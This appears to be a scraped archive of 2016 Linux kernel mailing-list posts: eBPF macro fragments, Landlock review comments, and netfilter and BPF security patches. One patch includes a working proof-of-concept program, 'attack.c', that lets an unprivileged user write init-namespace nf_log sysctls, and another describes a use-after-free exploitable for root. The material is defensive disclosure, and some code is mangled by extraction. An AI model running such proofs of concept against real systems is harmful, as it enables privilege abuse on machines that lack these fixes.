#define BPF_REG_ARG5BPF_REG_5
#define BPF_PSEUDO_MAP_FD   1
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) {\
.code  = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off   = 0, \
.imm   = (__u32) (IMM) }),  \
((struct bpf_insn) {\
.code  = 0, /* zero is reserved opcode */   \
.dst_reg = 0,   \
.src_reg = 0,   \
.off   = 0, \
.imm   = ((__u64) (IMM)) >> 32 })
#define BPF_ALU32_IMM(OP, DST, IMM) \
((struct bpf_insn) {\
.code  = BPF_ALU | BPF_OP(OP) | BPF_K,  \
.dst_reg = DST, \
.src_reg = 0,   \
.off   = 0, \
.imm   = IMM })
#define BPF_LD_MAP_FD(DST, MAP_FD)  \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_ALU32_REG(OP, DST, SRC) \
((struct bpf_insn) {\
.code  = BPF_ALU | BPF_OP(OP) | BPF_X,  \
.dst_reg = DST, \
.src_reg = SRC, \
.off   = 0, \
.imm   = 0 })
#define BPF_EXIT_INSN() \
((struct bpf_insn) {\
.code  = BPF_JMP | BPF_EXIT,\
.dst_reg = 0,   \
.src_reg = 0,   \
.off   = 0, \
.imm   = 0 })
/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)\
((struct bpf_insn) {\
.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off   = OFF,   \
.imm   = 0 })
#define BPF_REG_FP  BPF_REG_10
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) {\
.code  = BPF_ALU64 | BPF_MOV | BPF_X,   \
.dst_reg = DST, \
.src_reg = SRC, \
.off   = 0, \
.imm   = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) {\
.code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,\
.dst_reg = DST, \
.src_reg = 0,   \
.off   = 0, \
.imm   = IMM })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) {\
.code  = BPF_ALU64 | BPF_MOV | BPF_X,   \
.dst_reg = DST,   

Re: [kernel-hardening] [RFC v4 03/18] bpf,landlock: Add a new arraymap type to deal with (Landlock) handles

2016-10-26 Thread Jann Horn
On Wed, Oct 26, 2016 at 10:03:09PM +0200, Mickaël Salaün wrote:
> On 26/10/2016 21:01, Jann Horn wrote:
> > On Wed, Oct 26, 2016 at 08:56:39AM +0200, Mickaël Salaün wrote:
> >> This new arraymap looks like a set and brings new properties:
> >> * strong typing of entries: the eBPF functions get the array type of
> >>   elements instead of CONST_PTR_TO_MAP (e.g.
> >>   CONST_PTR_TO_LANDLOCK_HANDLE_FS);
> >> * force sequential filling (i.e. replace or append-only update), which
> >>   allow quick browsing of all entries.
> >>
> >> This strong typing is useful to statically check if the content of a map
> >> can be passed to an eBPF function. For example, Landlock use it to store
> >> and manage kernel objects (e.g. struct file) instead of dealing with
> >> userland raw data. This improve efficiency and ensure that an eBPF
> >> program can only call functions with the right high-level arguments.
> >>
> >> The enum bpf_map_handle_type list low-level types (e.g.
> >> BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD) which are identified when
> >> updating a map entry (handle). This handle types are used to infer a
> >> high-level arraymap type which are listed in enum bpf_map_array_type
> >> (e.g. BPF_MAP_ARRAY_TYPE_LANDLOCK_FS).
> >>
> >> For now, this new arraymap is only used by Landlock LSM (cf. next
> >> commits) but it could be useful for other needs.
> >>
> >> Changes since v3:
> >> * make handle arraymap safe (RCU) and remove buggy synchronize_rcu()
> >> * factor out the arraymay walk
> >>
> >> Changes since v2:
> >> * add a RLIMIT_NOFILE-based limit to the maximum number of arraymap
> >>   handle entries (suggested by Andy Lutomirski)
> >> * remove useless checks
> >>
> >> Changes since v1:
> >> * arraymap of handles replace custom checker groups
> >> * simpler userland API
> > [...]
> >> +  case BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD:
> >> +  handle_file = fget(handle->fd);
> >> +  if (IS_ERR(handle_file))
> >> +  return ERR_CAST(handle_file);
> >> +  /* check if the FD is tied to a user mount point */
> >> +  if (unlikely(handle_file->f_path.mnt->mnt_flags & 
> >> MNT_INTERNAL)) {
> >> +  fput(handle_file);
> >> +  return ERR_PTR(-EINVAL);
> >> +  }
> >> +  path_get(_file->f_path);
> >> +  ret = kmalloc(sizeof(*ret), GFP_KERNEL);
> >> +  ret->path = handle_file->f_path;
> >> +  fput(handle_file);
> > 
> > You can use fdget() and fdput() here because the reference to
> > handle_file is dropped before the end of the syscall.
> 
> The reference to handle_file is dropped but not the reference to the
> (inner) path thanks to path_get().

That's irrelevant. As long as you promise to fdput() any references
acquired using fdget() before any of the following can happen, using
fdget() is okay:
 - the syscall exits
 - the fd table is shared with a process that might write to it
 - an fd is closed by the kernel
In other words, you must be able to prove that nobody can remove the
struct file * from your fd table before you fdput().

Taking a long-term reference to an object pointed to by a struct file
that was looked up with fdget() is fine.


signature.asc
Description: Digital signature


Re: [kernel-hardening] [RFC v4 03/18] bpf,landlock: Add a new arraymap type to deal with (Landlock) handles

2016-10-26 Thread Jann Horn
On Wed, Oct 26, 2016 at 08:56:39AM +0200, Mickaël Salaün wrote:
> This new arraymap looks like a set and brings new properties:
> * strong typing of entries: the eBPF functions get the array type of
>   elements instead of CONST_PTR_TO_MAP (e.g.
>   CONST_PTR_TO_LANDLOCK_HANDLE_FS);
> * force sequential filling (i.e. replace or append-only update), which
>   allow quick browsing of all entries.
> 
> This strong typing is useful to statically check if the content of a map
> can be passed to an eBPF function. For example, Landlock use it to store
> and manage kernel objects (e.g. struct file) instead of dealing with
> userland raw data. This improve efficiency and ensure that an eBPF
> program can only call functions with the right high-level arguments.
> 
> The enum bpf_map_handle_type list low-level types (e.g.
> BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD) which are identified when
> updating a map entry (handle). This handle types are used to infer a
> high-level arraymap type which are listed in enum bpf_map_array_type
> (e.g. BPF_MAP_ARRAY_TYPE_LANDLOCK_FS).
> 
> For now, this new arraymap is only used by Landlock LSM (cf. next
> commits) but it could be useful for other needs.
> 
> Changes since v3:
> * make handle arraymap safe (RCU) and remove buggy synchronize_rcu()
> * factor out the arraymay walk
> 
> Changes since v2:
> * add a RLIMIT_NOFILE-based limit to the maximum number of arraymap
>   handle entries (suggested by Andy Lutomirski)
> * remove useless checks
> 
> Changes since v1:
> * arraymap of handles replace custom checker groups
> * simpler userland API
[...]
> + case BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD:
> + handle_file = fget(handle->fd);
> + if (IS_ERR(handle_file))
> + return ERR_CAST(handle_file);
> + /* check if the FD is tied to a user mount point */
> + if (unlikely(handle_file->f_path.mnt->mnt_flags & 
> MNT_INTERNAL)) {
> + fput(handle_file);
> + return ERR_PTR(-EINVAL);
> + }
> + path_get(_file->f_path);
> + ret = kmalloc(sizeof(*ret), GFP_KERNEL);
> + ret->path = handle_file->f_path;
> + fput(handle_file);

You can use fdget() and fdput() here because the reference to
handle_file is dropped before the end of the syscall.


> + break;
> + case BPF_MAP_HANDLE_TYPE_UNSPEC:
> + default:
> + return ERR_PTR(-EINVAL);
> + }
> + ret->type = handle_type;
> + return ret;
> +}
> +
> +static void *nop_map_lookup_elem(struct bpf_map *map, void *key)
> +{
> + return ERR_PTR(-EINVAL);
> +}
> +
> +/* called from syscall or from eBPF program */
> +static int landlock_array_map_update_elem(struct bpf_map *map, void *key,
> + void *value, u64 map_flags)
> +{

This being callable from eBPF context is IMO pretty surprising and should
at least be well-documented. Also: What is the usecase here?


signature.asc
Description: Digital signature


Re: [RFC v4 00/18] Landlock LSM: Unprivileged sandboxing

2016-10-26 Thread Jann Horn
On Wed, Oct 26, 2016 at 08:56:36AM +0200, Mickaël Salaün wrote:
> The loaded Landlock eBPF programs can be triggered by a seccomp filter
> returning RET_LANDLOCK. In addition, a cookie (16-bit value) can be passed 
> from
> a seccomp filter to eBPF programs. This allow flexible security policies
> between seccomp and Landlock.

Is this still up to date, or was that removed in v3?


signature.asc
Description: Digital signature


Re: [PATCH] netfilter: don't permit unprivileged writes to global state via sysctls

2016-10-22 Thread Jann Horn
On Thu, Oct 20, 2016 at 02:37:47PM -0400, David Miller wrote:
> From: Pablo Neira Ayuso <pa...@netfilter.org>
> Date: Thu, 20 Oct 2016 20:22:24 +0200
> 
> > On Sat, Sep 24, 2016 at 12:21:04AM +0200, Jann Horn wrote:
> >> This prevents the modification of nf_conntrack_max in unprivileged network
> >> namespaces. For unprivileged network namespaces, ip_conntrack_max is kept
> >> as a readonly sysctl in order to minimize potential compatibility issues.
> >> 
> >> This patch should apply cleanly to the net tree.
> > 
> > For the record: This patch looks good to me, but this legacy
> > ip_conntrack sysctl code is now gone.
> > 
> > I don't know what is the procedure to get this to -stable branches now
> > that this cannot be pushed upstream.
> 
> In the commit message for the -stable submission simply say "Not
> applicable" in the upstream commit reference.  Like:
> 
>   [ Upstream commit: Not applicable ]
> 
> or something like that.

Who should do that? Me, after getting a maintainer ack? Or the maintainer?


signature.asc
Description: Digital signature


[PATCH] netfilter: don't permit unprivileged writes to global state via sysctls

2016-09-23 Thread Jann Horn
This prevents the modification of nf_conntrack_max in unprivileged network
namespaces. For unprivileged network namespaces, ip_conntrack_max is kept
as a readonly sysctl in order to minimize potential compatibility issues.

This patch should apply cleanly to the net tree.

Signed-off-by: Jann Horn <j...@thejh.net>
---
 net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c 
b/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
index ae1a71a..a639e94 100644
--- a/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
+++ b/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
@@ -358,6 +358,9 @@ static int ipv4_init_net(struct net *net)
if (!in->ctl_table)
return -ENOMEM;
 
+   if (net->user_ns != _user_ns)
+   in->ctl_table[0].mode = 0444;
+
in->ctl_table[0].data = _conntrack_max;
in->ctl_table[1].data = >ct.count;
in->ctl_table[2].data = _conntrack_htable_size;
-- 
2.1.4



[PATCH] net: explicitly whitelist sysctls for unpriv namespaces

2016-09-18 Thread Jann Horn
There were two net sysctls that could be written from unprivileged net
namespaces, but weren't actually namespaced.

To fix the existing issues and prevent stuff this from happening again in
the future, explicitly whitelist permitted sysctls.

Note: The current whitelist is "allow everything that was previously
accessible and that doesn't obviously modify global state".

On my system, this patch just removes the write permissions for
ipv4/netfilter/ip_conntrack_max, which would have been usable for a local
DoS. With a different config, the ipv4/vs/debug_level sysctl would also be
affected.

Maximum impact of this seems to be local DoS, and it's a fairly large
commit, so I'm sending this publicly directly.

An alternative (and much smaller) fix would be to just change the
permissions of the two files in question to be 0444 in non-privileged
namespaces, but I believe that this solution is slightly less error-prone.
If you think I should switch to the simple fix, let me know.

Signed-off-by: Jann Horn <j...@thejh.net>
---
 include/linux/sysctl.h |  1 +
 net/ax25/sysctl_net_ax25.c |  4 +++-
 net/ieee802154/6lowpan/reassembly.c|  7 +--
 net/ipv4/devinet.c |  2 ++
 net/ipv4/ip_fragment.c | 10 ++---
 net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c |  3 +++
 net/ipv4/netfilter/nf_conntrack_proto_icmp.c   |  2 ++
 net/ipv4/sysctl_net_ipv4.c |  4 +++-
 net/ipv4/xfrm4_policy.c|  1 +
 net/ipv6/addrconf.c|  1 +
 net/ipv6/icmp.c|  1 +
 net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c |  1 +
 net/ipv6/netfilter/nf_conntrack_reasm.c|  7 +--
 net/ipv6/sysctl_net_ipv6.c | 23 ++---
 net/ipv6/xfrm6_policy.c|  1 +
 net/mpls/af_mpls.c |  2 ++
 net/netfilter/ipvs/ip_vs_ctl.c | 26 
 net/netfilter/nf_conntrack_proto_generic.c |  2 ++
 net/netfilter/nf_conntrack_proto_sctp.c| 16 +++
 net/netfilter/nf_conntrack_proto_tcp.c | 26 
 net/netfilter/nf_conntrack_proto_udp.c |  4 
 net/netfilter/nf_conntrack_proto_udplite.c |  2 ++
 net/netfilter/nf_log.c |  1 +
 net/rds/tcp.c  |  2 ++
 net/sctp/sysctl.c  |  4 +++-
 net/sysctl_net.c   | 28 +-
 26 files changed, 154 insertions(+), 27 deletions(-)

diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
index a4f7203..c47c52d 100644
--- a/include/linux/sysctl.h
+++ b/include/linux/sysctl.h
@@ -116,6 +116,7 @@ struct ctl_table
struct ctl_table_poll *poll;
void *extra1;
void *extra2;
+   bool namespaced;/* allow writes in unpriv netns? */
 };
 
 struct ctl_node {
diff --git a/net/ax25/sysctl_net_ax25.c b/net/ax25/sysctl_net_ax25.c
index 919a5ce..8e6ab36 100644
--- a/net/ax25/sysctl_net_ax25.c
+++ b/net/ax25/sysctl_net_ax25.c
@@ -158,8 +158,10 @@ int ax25_register_dev_sysctl(ax25_dev *ax25_dev)
if (!table)
return -ENOMEM;
 
-   for (k = 0; k < AX25_MAX_VALUES; k++)
+   for (k = 0; k < AX25_MAX_VALUES; k++) {
table[k].data = _dev->values[k];
+   table[k].namespaced = true;
+   }
 
snprintf(path, sizeof(path), "net/ax25/%s", ax25_dev->dev->name);
ax25_dev->sysheader = register_net_sysctl(_net, path, table);
diff --git a/net/ieee802154/6lowpan/reassembly.c 
b/net/ieee802154/6lowpan/reassembly.c
index 30d875d..8a1d5b7 100644
--- a/net/ieee802154/6lowpan/reassembly.c
+++ b/net/ieee802154/6lowpan/reassembly.c
@@ -456,7 +456,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.maxlen = sizeof(int),
.mode   = 0644,
.proc_handler   = proc_dointvec_minmax,
-   .extra1 = _net.ieee802154_lowpan.frags.low_thresh
+   .extra1 = _net.ieee802154_lowpan.frags.low_thresh,
+   .namespaced = true,
},
{
.procname   = "6lowpanfrag_low_thresh",
@@ -465,7 +466,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.mode   = 0644,
.proc_handler   = proc_dointvec_minmax,
.extra1 = ,
-   .extra2 = _net.ieee802154_lowpan.frags.high_thresh
+   .extra2 = _net.ieee802154_lowpan.frags.high_thresh,
+   .namespaced = true,
},
{
.procname   = "6lowpanfrag_time",
@@ -473,6 +475,7 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.maxl

[PATCH] netfilter: fix namespace handling in nf_log_proc_dostring

2016-09-18 Thread Jann Horn
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char child_stack[100];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}

int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
  NULL))
err(1, "mount");

/* Yes, we need to set the maps for the net sysctls to recognize us
 * as namespace root.
 */
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);

stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}

int main(void) {
outer_uid = getuid();
outer_gid = getgid();

int child = clone(child_fn, child_stack + sizeof(child_stack),
  CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
  |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait() != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");

char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <j...@thejh.net>
---
 net/netfilter/nf_log.c | 6 --
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index aa5847a..1df2c8d 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -420,7 +420,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, 
int write,
char buf[NFLOGGER_NAME_LEN];
int r = 0;
int tindex = (unsigned long)table->extra1;
-   struct net *net = current->nsproxy->net_ns;
+   struct net *net = table->extra2;
 
if (write) {
struct ctl_table tmp = *table;
@@ -474,7 +474,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
-   nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
nf_log_sysctl_table[i].mode = 0644;
nf_log_sysctl_table[i].proc_handler =
@@ -484,6 +483,9 @@ static int netfilter_log_sysctl_init(struct net *net)
}
}
 
+   for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+   table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
-- 
2.1.4



Re: [RFC v3 07/22] landlock: Handle file comparisons

2016-09-14 Thread Jann Horn
On Wed, Sep 14, 2016 at 09:24:00AM +0200, Mickaël Salaün wrote:
> Add eBPF functions to compare file system access with a Landlock file
> system handle:
> * bpf_landlock_cmp_fs_prop_with_struct_file(prop, map, map_op, file)
>   This function allows to compare the dentry, inode, device or mount
>   point of the currently accessed file, with a reference handle.
> * bpf_landlock_cmp_fs_beneath_with_struct_file(opt, map, map_op, file)
>   This function allows an eBPF program to check if the current accessed
>   file is the same or in the hierarchy of a reference handle.
[...]
> diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
> index 94256597eacd..edaab4c87292 100644
> --- a/kernel/bpf/arraymap.c
> +++ b/kernel/bpf/arraymap.c
> @@ -603,6 +605,9 @@ static void landlock_put_handle(struct 
> map_landlock_handle *handle)
>   enum bpf_map_handle_type handle_type = handle->type;
>  
>   switch (handle_type) {
> + case BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD:
> + path_put(>path);
> + break;
>   case BPF_MAP_HANDLE_TYPE_UNSPEC:
>   default:
>   WARN_ON(1);
[...]
> diff --git a/security/landlock/checker_fs.c b/security/landlock/checker_fs.c
> new file mode 100644
> index ..39eb85dc7d18
> --- /dev/null
> +++ b/security/landlock/checker_fs.c
[...]
> +static inline u64 bpf_landlock_cmp_fs_prop_with_struct_file(u64 r1_property,
> + u64 r2_map, u64 r3_map_op, u64 r4_file, u64 r5)
> +{
> + u8 property = (u8) r1_property;
> + struct bpf_map *map = (struct bpf_map *) (unsigned long) r2_map;
> + enum bpf_map_array_op map_op = r3_map_op;
> + struct file *file = (struct file *) (unsigned long) r4_file;
> + struct bpf_array *array = container_of(map, struct bpf_array, map);
> + struct path *p1, *p2;
> + struct map_landlock_handle *handle;
> + int i;

Please don't use int when iterating over an array, use size_t.


> + /* for now, only handle OP_OR */

Is "OP_OR" an appropriate name for something that ANDs the success of
checks?


[...]
> + synchronize_rcu();

Can you put a comment here that explains what's going on?


> + for (i = 0; i < array->n_entries; i++) {
> + bool result_dentry = !(property & LANDLOCK_FLAG_FS_DENTRY);
> + bool result_inode = !(property & LANDLOCK_FLAG_FS_INODE);
> + bool result_device = !(property & LANDLOCK_FLAG_FS_DEVICE);
> + bool result_mount = !(property & LANDLOCK_FLAG_FS_MOUNT);
> +
> + handle = (struct map_landlock_handle *)
> + (array->value + array->elem_size * i);
> +
> + if (handle->type != BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD) {
> + WARN_ON(1);
> + return -EFAULT;
> + }
> + p1 = >path;
> +
> + if (!result_dentry && p1->dentry == p2->dentry)
> + result_dentry = true;

Why is this safe? As far as I can tell, this is not in an RCU read-side
critical section (synchronize_rcu() was just called), and no lock has been
taken. What prevents someone from removing the arraymap entry while we're
looking at it? Am I missing something?


[...]
> +static inline u64 bpf_landlock_cmp_fs_beneath_with_struct_file(u64 r1_option,
> + u64 r2_map, u64 r3_map_op, u64 r4_file, u64 r5)
> +{
> + u8 option = (u8) r1_option;
> + struct bpf_map *map = (struct bpf_map *) (unsigned long) r2_map;
> + enum bpf_map_array_op map_op = r3_map_op;
> + struct file *file = (struct file *) (unsigned long) r4_file;
> + struct bpf_array *array = container_of(map, struct bpf_array, map);
> + struct path *p1, *p2;
> + struct map_landlock_handle *handle;
> + int i;

As above, please use size_t.


signature.asc
Description: Digital signature


Re: [PATCH net 2/3] bpf: fix check_map_func_compatibility logic

2016-04-28 Thread Jann Horn
On Thu, Apr 28, 2016 at 3:56 AM, Alexei Starovoitov <a...@fb.com> wrote:
> The commit 35578d798400 ("bpf: Implement function bpf_perf_event_read() that 
> get the selected hardware PMU conuter")
> introduced clever way to check bpf_helper<->map_type compatibility.
> Later on commit a43eec304259 ("bpf: introduce bpf_perf_event_output() 
> helper") adjusted
> the logic and inadvertently broke it.
> Get rid of the clever bool compare and go back to two-way check
> from map and from helper perspective.
>
> Fixes: a43eec304259 ("bpf: introduce bpf_perf_event_output() helper")
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Alexei Starovoitov <a...@kernel.org>
> Signed-off-by: Daniel Borkmann <dan...@iogearbox.net>
> ---
>  kernel/bpf/verifier.c | 65 
> +++
>  1 file changed, 40 insertions(+), 25 deletions(-)
>
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index 89bcaa0966da..c5c17a62f509 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
[...]
> +   case BPF_MAP_TYPE_PROG_ARRAY:
> +   if (func_id != BPF_FUNC_tail_call)
> +   goto error;
> +   break;
> +   case BPF_MAP_TYPE_PERF_EVENT_ARRAY:
> +   if (func_id != BPF_FUNC_perf_event_read &&
> +   func_id != BPF_FUNC_perf_event_output)
> +   goto error;
> +   break;
> +   case BPF_MAP_TYPE_STACK_TRACE:
> +   if (func_id != BPF_FUNC_get_stackid)
> +   goto error;
> +   break;
> +   default:
> +   break;
> +   }
> +
> +   /* ... and second from the function itself. */
> +   switch (func_id) {
> +   case BPF_FUNC_tail_call:
> +   if (map->map_type != BPF_MAP_TYPE_PROG_ARRAY)
> +   goto error;
> +   break;
> +   case BPF_FUNC_perf_event_read:
> +   case BPF_FUNC_perf_event_output:
> +   if (map->map_type != BPF_MAP_TYPE_PERF_EVENT_ARRAY)
> +   goto error;
> +   break;
> +   case BPF_FUNC_get_stackid:
> +   if (map->map_type != BPF_MAP_TYPE_STACK_TRACE)
> +   goto error;
> +   break;
> +   default:
> +   break;
> }

Looks good to me.


[PATCH] bpf: fix double-fdput in replace_map_fd_with_map_ptr()

2016-04-26 Thread Jann Horn
When bpf(BPF_PROG_LOAD, ...) was invoked with a BPF program whose bytecode
references a non-map file descriptor as a map file descriptor, the error
handling code called fdput() twice instead of once (in __bpf_map_get() and
in replace_map_fd_with_map_ptr()). If the file descriptor table of the
current task is shared, this causes f_count to be decremented too much,
allowing the struct file to be freed while it is still in use
(use-after-free). This can be exploited to gain root privileges by an
unprivileged user.

This bug was introduced in
commit 0246e64d9a5f ("bpf: handle pseudo BPF_LD_IMM64 insn"), but is only
exploitable since
commit 1be7f75d1668 ("bpf: enable non-root eBPF programs") because
previously, CAP_SYS_ADMIN was required to reach the vulnerable code.

(posted publicly according to request by maintainer)

Signed-off-by: Jann Horn <ja...@google.com>
Signed-off-by: Linus Torvalds <torva...@linux-foundation.org>
---
 kernel/bpf/verifier.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 2e08f8e..8291251 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -2029,7 +2029,6 @@ static int replace_map_fd_with_map_ptr(struct 
verifier_env *env)
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid 
bpf_map\n",
insn->imm);
-   fdput(f);
return PTR_ERR(map);
}
 
-- 
2.8.0.rc3.226.g39d4020